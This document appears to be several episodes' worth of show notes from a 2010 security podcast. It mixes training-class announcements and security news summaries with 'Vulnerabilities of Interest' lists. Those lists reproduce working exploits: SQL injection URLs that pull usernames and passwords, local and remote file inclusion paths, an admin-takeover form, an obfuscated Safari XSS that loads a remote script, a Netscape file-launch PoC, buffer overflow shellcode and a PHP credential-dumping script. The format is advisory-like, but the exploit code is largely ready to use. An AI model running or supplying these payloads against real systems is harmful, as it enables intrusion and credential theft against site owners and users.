Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS MGMT 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS SEC 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Atlanta ISSA:
http://www.secureworldexpo.com/events/index.php?id=281
Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. WordPress My Category Order Plugin (mycategoryorder.php) is subject to a SQL Injection vulnerability because it fails to properly sansitize user supplied input in a SQL query.  Versions less than 2.8 are affected.  Exploit URL is available: http://www.sample.com/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0′&idString=3,5,4,1
   2. AfterLogic WebMail Pro is subject to a Cross-Site Scripting vulnerability, allowing injection of malicious code in the context of the application.  Versions less than 4.7.10 are affected.  The targeted user must be logged in the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8.
      <html>
      <head>
      </head>
      <body >
      <form method=”post”
      action=”http://WEBSITE/history-storage.aspx?param=0.21188772204998574″
      onSubmit=”return false;”>
      <input value=”value”/>
      <input name=”HistoryStorageObjectName” value=”location;
      alert(‘xss’); //”/>
      </form>
      </body>
      </html>
      The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11
   3. DreamPoll is subject to a Cross-Site Scripting and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application.  Versions less than 4.7.10 are affected.  Example URLs are available: http://www.sample.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

      http://www.sample.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

   4. Docebo is subject to a Multiple SQL Injection vulnerabilities Versions 3.6.0.3 is affected. Google Dork: Powered by PHP Live! v3.2.1, Powered by PHP Live! v3.2.2 and allinurl:”request.php” “deptid”.  Example URLs are available: http://www.sample.com/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

      http://www.sample.com/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

      http://www.sample.com/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2

   5. Pepsi CMS (Irmin cms) is subject to multiple Local File Inclusion (LFI) vulnerabilities. Version pepsi-0.6-BETA2 is affected. Example URLs are available: http://www.sample.com/PATH/index.php?w=[LFI%]

      http://www.sample.com/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00

   6. Joomla Component com_guide is subject to a SQL Injection vulnerability. Example URLs are available: http://www.sample.com/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12–
   7. Peazip is subject to a division by zero attack resulting in denial of service vulnerability.  Version 3.0 is affected, though others maybe as well.  To trigger the vulnerability open up the application, click tools, enter password / keyfile.

Stories of Interest:
News item 1:http://fcw.com/articles/2010/03/24/fose-cloud-computing-not-always-helpful-in-data-recovery.aspx
Newer technologies such as cloud computing can be a boon for post-disaster recovery of data, but they don’t always help much, Dennis Heretick, former chief information security officer for the Justice Department, said at a FOSE trade show session today.

“Cloud computing can provide more reliability, but that should not be assumed,” Heretick said. How a specific cloud application fits within an agency’s or company’s disaster recovery strategy should be assessed by each organization individually, he added.

Overall, in the last five years, disaster recovery and business continuity planning have become easier and less costly because of the availability of automated electronic storage processes for critical data, Heretick said.

Even so, there are hurdles to overcome in developing and implementing a disaster recovery plan and process. Some of the main obstacles include the difficulty of obtaining management support for disaster recovery goals and identifying and obtaining support for roles for individuals to perform in executing the plan, Heretick said.

News item 2:http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=224200279
Seventy-seven percent of C-level executives in a 115-person survey conducted in the U.K. say their organization has experienced a data breach at some point and all of them report attacks targeting corporate data in the past 12 months.

These findings come from a study released on Wednesday by IBM, a company that sells data protection services, and The Ponemon Institute, a privacy and information management research organization.

Larry Ponemon, founder of the group that bears his name, said that survey shows a shift in the way C-level executives think about security software. Investing in data protection, he said, is now seen as less expensive than recovering from a data breach.

Data protection initiatives on average, according to the survey, result in a cost savings or revenue improvement of 11 million ($16 million) for organizations.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Simple Machines Forum Avatar is subject to a Remote php File vulnerability.  This vulnerability allow execute a php external file in any visitor of the forum. The php file should have the malicious code. The scope of the attack depends on the strength of the php file.  This impacts version 1.1.8, though others may be vulnerable as well.  Proof of concept is available:
      <?php
      $ip = $_SERVER['REMOTE_ADDR'];
      $so= $_SERVER['HTTP_USER_AGENT'];
      $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
      $url= $_SERVER['PHP_SELF'];
      $path= $_SERVER['DOCUMENT_ROOT'];
      $archivo = ‘hacks.txt’;
      $fp = fopen($archivo, “a”);
      $string = ”
      Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
      by Jose Luis Gongora Fernandez (aka) JosS

      $path$url

      VICTIM: $ip

      info: $so
      language: $lan

      “;
      $write = fputs($fp, $string);
      fclose($fp);
      ?>

   2. Joomla Component dcsFlashGames is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Version 2.0RC1 is impacted. Example URL is available:  http://www.sample.com/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&;catid=[INDONESIANCODER]
   3. Joomla Component com_solution is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8–
   4. Joomla Component com_units is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_units&task=unit&id=-1 UNIONSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28–
   5. Joomla Component com_tariff is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
   6. Joomla Component com_agency is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_agency&task=view&aid=-1 UNIONSELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
   7. Joomla Component com_adds is subject to a Blind SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2–
   8. Joomla Component com_departments is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
   9. Joomla Component com_business is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3–
   10. Joomla Component com_radio is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
   11. Asp – comersus7F Shopping Cart Software is subject to a Backup Dump Vulnerability. By default, comersus.mdb isn’t password-protected, and contains the order information (buyer’s address, phone, order status, tracking #, obs, etc), settings (encryption password, admin email, company information, etc) and shipment data.  Exploit URL is available:  http://www.sample.com/Comersus/database/comersus.mdb .
   12. Powie’s PSCRIPT Gästebuch is subject to a SQL Injection Vulnerability. All versions earlier than 2.09 are impacted.  Exploit URL is available: http://www.sample.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2

Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/03/29/ie_emergency_fix/
Microsoft has announced plans to release an out-of-sequence patch, designed to resolve a zero-day vulnerability in Internet Explorer.

A cumulative update to Internet Explorer (MS10-018) plugs a security hole in IE 6 and IE 7 exploit by hackers over recent weeks. The latest version of Microsoft’s browser – IE 8 – is not vulnerable to the flaw, which Microsoft first acknowledged was a problem on 9 March.

The vulnerability involves a flaw in the iepeers.dll library involving the handling of invalid values passed to the “setAttribute()” function. Exploits create a means to drop malware onto the PCs of victims, providing they visit booby-trapped website using vulnerable version of IE.

News item 2: http://www.computerworld.com/s/article/9174337/Apple_delivers_record_monster_security_update?taxonomyId=17
Apple today patched 92 vulnerabilities, a third of them critical, in a record update to its Leopard and Snow Leopard operating systems.

Security Update 2010-002 plugged 92 holes in the client and server editions of Mac OS X 10.5 and Mac OS X 10.6, breaking a record that has stood since March 2008. The update dwarfed any released last year, when Apple’s largest patched 67 vulnerabilities.

Today’s security roll-up fixed flaws in 42 different applications or operating system components in Mac OS X, from AppKit and Application Firewall to unzip and X11, the Mac’s version of the X Window System.

News item 3: http://fcw.com/articles/2010/03/23/web-fose-bratton-lapd-cyber.aspx
Local police departments have the knowledge but lack the resources for cybersecurity-related police efforts, according to former Los Angeles Police Department Chief Bill Bratton.

Speaking as the keynote address at the FOSE 2010 trade show in Washington, Bratton said local police departments have been behind the curve for most of their history in tackling computer-related crime and cybersecurity.

Bratton, who also served as commissioner of the New York City Police Department, also said that computer security is an unmet challenge for police departments that is unlikely to be addressed in significant way because of funding, prioritization, resources and access to systems.

He added that the situation is frustrating for police chiefs. We know how to do it; we know how to coordinate it,” he said. “It.s a resource issue.”  Bratton is now chairman of Altegrity Risk International. He also previously served as chief of the New York City Transit Police and as Boston Police Department commissioner.

News item 4: http://www.ottawacitizen.com/technology/Canada+easy+prey+cyber+attacker+expert/2718450/story.html
Canada is woefully unprepared for a massive cyber-attack that is within the capabilities of any run-of-the-mill hacker, and which could cripple the business of the nation, warns a leading security expert.

Dragos Ruiu, an Edmonton-based computer security consultant, says it’s time for the government to protect complex computer networks that can now be hijacked with the simplest of tools.

“There has got to be a lot more thought and a lot more talk and a lot more brains applied to the situation,” said Ruiu. “The cyber-warfare world is the only place a 17-year-old kid can take on a nation-state and win.”

Ruiu, a key organizer of the CanSecWest Applied Security Conference in Vancouver, said that when it comes to computer security, even the popular pocket-sized smartphones are open to attack. He said this years conference will play host to a hacking contest to see which cellphone is the most secure.

News item 5:  http://news.bbc.co.uk/2/hi/europe/8586269.stm
A Frenchman who police say hacked Twitter accounts belonging to US President Barack Obama and celebrities could face jail. The unemployed 25-year-old was arrested on Tuesday after an operation lasting several months, conducted by French police with agents from the FBI.  The 25-year-old is said to have hacked into the micro-blogging website, by simply guessing users’ passwords.

The suspect reportedly targeted other celebrities, including Britney Spears. After being questioned by police, he was ordered to appear at court in the central French city of Clermont-Ferrand on 24 June.

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

• May 8, 2010 Jeffersonville,  Indiana
• (No URL for that as of yet)
• Proceeds with be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Pc4Uploader is subject to a Local File Include (LFI) vulnerability.  Version 9.0 – 10.0 are impacted.  Proof of Concept URL is available: http://www.sample.com/up/index.php?PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00
   2. AdaptCMS_Lite_1.5 is subject to change admin (user,passwd) & add new admin user vulnerability.  Version 1.5 2009-07-07 is impacted.  Exploit code is available:
      <html>
      <head>
      <body>
      <h2>coded by ahmadbady</h2>
      <form action=’admin.php?view=edit_users2&id=1′ method=’post’>
      <table cellpadding=’5′ cellspacing=’0′ border=’0′ width=’480′
      style=’padding-left:5px’ align=’left’>
      <tr><td>Username</td><td><input type=’text’
      name=’username1′ size=’16′
      value=’anything’
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td></tr><tr><td>New
      Password?</td><td><input type=’text’
      name=’password1′ size=’16′
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td></tr><tr><td>E-Mail</td><td><in
      put type=’text’ name=’email1′
      size=’16′ value=’anything’
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td></tr><tr><td>Level</td><td><sel
      ect name=’level’ style=’font-family:
      tahoma;
      font-size: 11px; border: 1px solid #444444;padding-left:1px’><option
      value=’Admin’
      selected>Admin – Level 1</option><option
      value=’Member’>Member – Level
      3</option>
      <option value=’Staff’>Staff – Level
      2</option></select></td></tr><tr><td>
      <input type=’submit’ value=’Update User’
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td>
      </tr></table></form>
      </td></tr></table>
      </body>
      </html>
   3. 68kb is subject to multiple Remote File Include (RFI) vulnerabilities.  Version 1.0.0rc2 is impacted.  Example URL is available:

      http://www.sample.com/themes/front/default/modules/show.php?file=shell.txt?

      http://www.sample.com/themes/admin/default/modules/show.php?file=shell.txt?

   4. Netscape Navigator, Namoroka web browser and Flock browser are subject to a URL Code Execution vulnerability.  Version 9.0.0.6 of Netscape Navigator is impacted.  Exploit code is available:
      <html>
      <head>
      <title>firelinking By eidelweiss</title>

      <– Copyright (C) 2009-2010 firelinking by eidelweiss –>
      <– Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all
      my friends –>
      <– This PoC is cross platform : On Windows this example creates the
      file –>
      <– c:\mampus.bat and launches it (opens a dos box with a dir command).
      On –>
      <– Linux (tested Fedora Core) the example creates the file –>
      <– ~/mampus.txt Depending on caching the the script might –>
      <– run twice in some cases (this will create an additional
      mampus-1.txt). –>

      <link rel=”SHORTCUT ICON” href=”favicon.ico”>
      <script language=”JavaScript”
      type=”text/javascript”>
      var pf = navigator.platform.toLowerCase();
      if (pf.indexOf(“win”) != -1) {
      var os = “win”;
      } else if (pf.indexOf(“linux”) != -1) {
      var os = “linux”;
      }
      function GoFuck() {
      // this is a bad caching workaround inside
      document.getElementById(‘outhtml’).innerHTML = “”;
      document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘clearhtml’).value
      document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘clearhtml’).value
      document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘clearhtml’).value
      window.setTimeout(“document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘linkhtml_”+os+”‘).value”,300);
      }
      </script>
      </head>
      <body>
      <div style=”font-family:Verdana;font-size:11px;”>

      <div
      style=”font-family:Verdana;font-size:15px;font-weight:bold;”>f
      irelinking By eidelweiss</div>
      <br><br>
      <div style=”width:600px”>
      <div
      style=”display:none”></div>

      <textarea style=”display:none”>
      <link rel=”SHORTCUT ICON” href=”favicon.ico”>
      </textarea>

      <textarea id=”linkhtml_win”
      style=”display:none”>
      <link rel=”SHORTCUT ICON”
      href=”view-source:javascript:delayedOpenWindow(‘
      javascript:netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXP
      Connect\’);
      file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Compo
      nents.interfaces.
      nsILocalFile);file.initWithPath(\’c:\\\\mampus.bat\’);file.createUnique(Com
      ponents.interfaces.
      nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.or
      g/network/
      file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputS
      tream);
      outputStream.init(file,0×04|0×08|0×20,420,0);output=\’@ECHO
      OFF\\n:BEGIN\\nCLS\\nDIR\\n
      PAUSE\\n:END\’;outputStream.write(output,output.length);outputStream.close(
      );file.launch();’,”,”)”>
      </textarea>

      <textarea
      style=”display:none”>
      <link rel=”SHORTCUT ICON”
      href=”view-source:javascript:delayedOpenWindow(‘javascript:
      netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXPConnect\’);
      file=Components.
      classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces
      .nsILocalFile);file.
      initWithPath(\’~/mampus.txt\’);file.createUnique(Components.interfaces.nsIF
      ile.
      NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/networ
      k/
      file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputS
      tream);
      outputStream.init(file,0×04|0×08|0×20,420,0);output=\’mampus!\’;outputStrea
      m.write
      (output,output.length);outputStream.close();’,”,”)”>
      </textarea>
      <br><br>
      <a href=”#”>Run
      exploit</a>
      </div>
      </body>
      </html>

   5. Apple Safari is subject to a history search vulnerability.  Code Execution Exploit PoC is available:
      <!–
      Copyright (C) 2009-2010 firelinking by eidelweiss
      Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
      Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
      This P0C made for Educational Purpose only
      Author Will Be not responsible For Any Damage.
      –>

      <html>
      <script>
      function Dick() {
      window.open(‘safari:historysearch?q=%2A”><img src=\’Dick\’
      Dickonerror=’evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,11
      0,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73
      ,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,11
      9,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104
      ,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,
      59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,1
      00,67,104,105,108,100,40,113,41,59))\’>&p=1&s=1′);
      window.setTimeout(“location.href=’mailto:’”,6666);
      }
      </script>
      <body scrolling=”no”>
      <a href=”#”>Suck
      Please…</a>
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      &lt;<img src=\’Dick\’
      Dickonerror=’evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,11
      0,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73
      ,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,11
      9,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104
      ,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,
      59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,1
      00,67,104,105,108,100,40,113,41,59))’&gt;
      </body>
      </html>

   6. Open Web Analytics is subject to multiple file include vulnerabilities.  Version 1.2.3 is impacted.  Code PoC URL is available: http://www.sample.com/mw_plugin.php?IP=shell.txt?
   7. MyOWNspace is subject to multiple file include vulnerabilities.  Version 8.2 is impacted.  Example URLs are available: http://www.sample.com/graph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/myowngraph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/showmyownfriends.php?go=../../../../../../../boot.ini%00

   8. DaFun Spirit is subject to a Remote File Inclusion (RFI) vulnerability.  Version 2.2.5 is impacted.  Example URLs are available: http://www.sample.com/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]

      http://www.sample.com/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]

   9. Mini-Stream Ripper is subject to a local stack buffer overflow vulnerability.  Version 3.1.0.8 is impacted.  Exploit code is available:
      # Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
      # Author: Hazem Mofeed
      # Download: http://www.mini-stream.net/mini-stream-ripper/download/
      # Home: http://hakxer.wordpress.com

      # [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] –> Exploited ..
      # http://www.exploit-db.com/exploits/11607
      shellcode = (“xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0″
      “x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c”
      “x63x2ex65x78x65x00″) # SP3(sh)

      # exploit
      exploit = (“x41″ * 43496 + “x08x6Ax83x7C” +
      “x08x6Ax83x7C” + shellcode )
      file = open(“exploit.smi”,”w”)
      file.write(exploit)
      file.close()

   10. SiteX CMS is subject to a SQL injection vulnerability.  Version 0.7.4 Beta is impacted.  Exploit code is available:
       <?php
       echo
       “nn###########################################################################n”;
       echo “####n”;
       echo “## Product: SiteX CMS 0.7.4 beta (/photo.php) SQL-Injectionexploit ##n”;
       echo “## Usage: php.exe sitex.php www.site.com /cmspath/##n”;
       echo “## Require: Magic_quotes = off##n”;
       echo “## Author: Sc0rpi0n [RUS] (http://scorpion.su)##n”;
       echo “## Special for Antichat (forum.antichat.ru)##n”;
       echo “## Bugs find: Iceangel_, [x60]unu, .:[melkiy]:.##n”;
       echo “####n”;
       echo
       “###########################################################################nn”;
       $host=$argv[1];
       $path=$argv[2];
       $script=”photo.php?albumid=”;
       $sql=urlencode(“-1′ UNION SELECT
       1,concat(0x3a3a,username,0x3a3a3a,password,0x3a3a3a3a),3,4,5,6,7,8 FROM
       SiteX_Users WHERE — “);
       $fsock=fsockopen($host,80);
       $headers=”GET http://$host$path$script$sql HTTP/1.0rn”;
       $headers.=”Host: $hostrnrn”;
       fwrite($fsock,$headers);
       while(!feof($fsock))
       $response.=fread($fsock,1024);
       $pos1=strpos($response,”::”) or die(“## http://$host is not
       vulnerable or errorn”);
       $pos2=strpos($response,”:::”) or die(“## http://$host is not
       vulnerable or errorn”);
       $pos3=strpos($response,”::::”) or die(“## http://$host is
       not vulnerable or errorn”);
       $len1=$pos2-$pos1;
       $len2=$pos3-$pos2;

       $login=substr($response,$pos1+2,$len1-2);
       $password=substr($response,$pos2+3,$len2-3);

       echo “## Host: $argv[1]n”;
       echo “## Login: $loginn”;
       echo “## Password: $passwordn”;
       ?>

Stories of Interest:
News item 1: http://www.computerworld.com/s/article/9173965/FBI_lists_Top_10_posts_in_cybercriminal_operations?taxonomyId=17
Criminal hacker organizations are operating with increasing corporate-life efficiency, specialization and expertise, according to the FBI.

From a business perspective, these criminal enterprises are highly productive and staffed by dedicated people willing to operate worldwide, around the clock “without holidays, weekends or vacations,” according to
Steven Chabinsky, deputy assistant director in the FBI’s cyber division. “As a result, when an opportunity presents itself these criminals can start planning within hours.”

According to the FBI the top 10 positions in cyber criminal organizations are:

1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.
2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.
3. Tech experts, who maintain the criminal enterprise’s IT infrastructure, including servers, encryption technologies, databases, and the like.
4. Hackers, who search for and exploit applications, systems and network vulnerabilities.
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.
10. Organization Leaders, often “people persons” without technical skills. The leaders assemble the team and choose the targets.

News item 2:http://www.computerworld.com/s/article/9174242/Military_warns_of_increasingly_active_cyber_threat_from_China_
On the same day that Google Inc. and the GoDaddy Group Inc. complained about China to a congressional committee, U.S. Navy Admiral Robert Willard appeared before the U.S. House Armed Services Committee with an even stronger warning about cyber-threats posed by China.

Willard’s comments about China received little press attention but were stronger than anything said by either company.

“U.S. military and government networks and computer systems continue to be the target of intrusions that appear to have originated from within the PRC (People’s Republic of China),” said Willard.

He said that most of the intrusions are focused on acquiring data “but the skills being demonstrated would also apply to network attacks.”

Willard testified on the military’s operations in its Pacific command, which he said “faces increasingly active and sophisticated threats to our information and computer infrastructure.”
News item 3: http://www.telegraph.co.uk/news/newstopics/howaboutthat/7532996/Ageing-spies-unable-to-use-the-internet.html
The Security Service is launching an unprecedented round of redundancies to improve the overall level of computer skills among its staff.

Despite an expanding budget, MI5 is laying off employees in order to hire new intelligence officers and support staff with better command of information technology and other “deployable” skills.

The redundancy programme has set tongues wagging in Whitehall, with civil servants in other departments joking about a “James Bond generation” of elderly spies being put out to pasture because they can’t use the internet and don’t understand the world of Twitter or Facebook.

The plan was disclosed by Jonathan Evans, the director-general of MI5. He told a Parliamentary committee that he is concerned that his agency’s overall IT skills are not up to scratch, leading him to get rid of some employees.

News item 4:http://www.kptv.com/news/22964989/detail.html
The theft of a computer from Molalla’s water treatment facility is being considered a federal crime by authorities.  Someone broke into the water plant Saturday night and stole the computer, which was what kept the plant working on auto pilot. Water service to Molalla has not been affected, but workers must operate the plant the old-fashioned way.

“It has to be manually run and also inspected (so) visual checks can be made,” said Marc Howatt, the city’s public works director.

The thieves broke into the water plant through a back window. Once inside, Howatt said, the thief triggered a motion detector and an on-call manager rushed to the facility and found the front door open and one of the computers gone.

The computer contained software that monitored the water pumps, reservoir and chlorine levels.”The software enables ease of operation,” Howatt said. “It allows the operator to log onto a screen and see what’s happening with the plant at any given time during the day.”  The following day, workers found the computer in a pond on the property. City officials said it’s destroyed, but a technician is trying to salvage the hard drive and the costly programming on it.

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
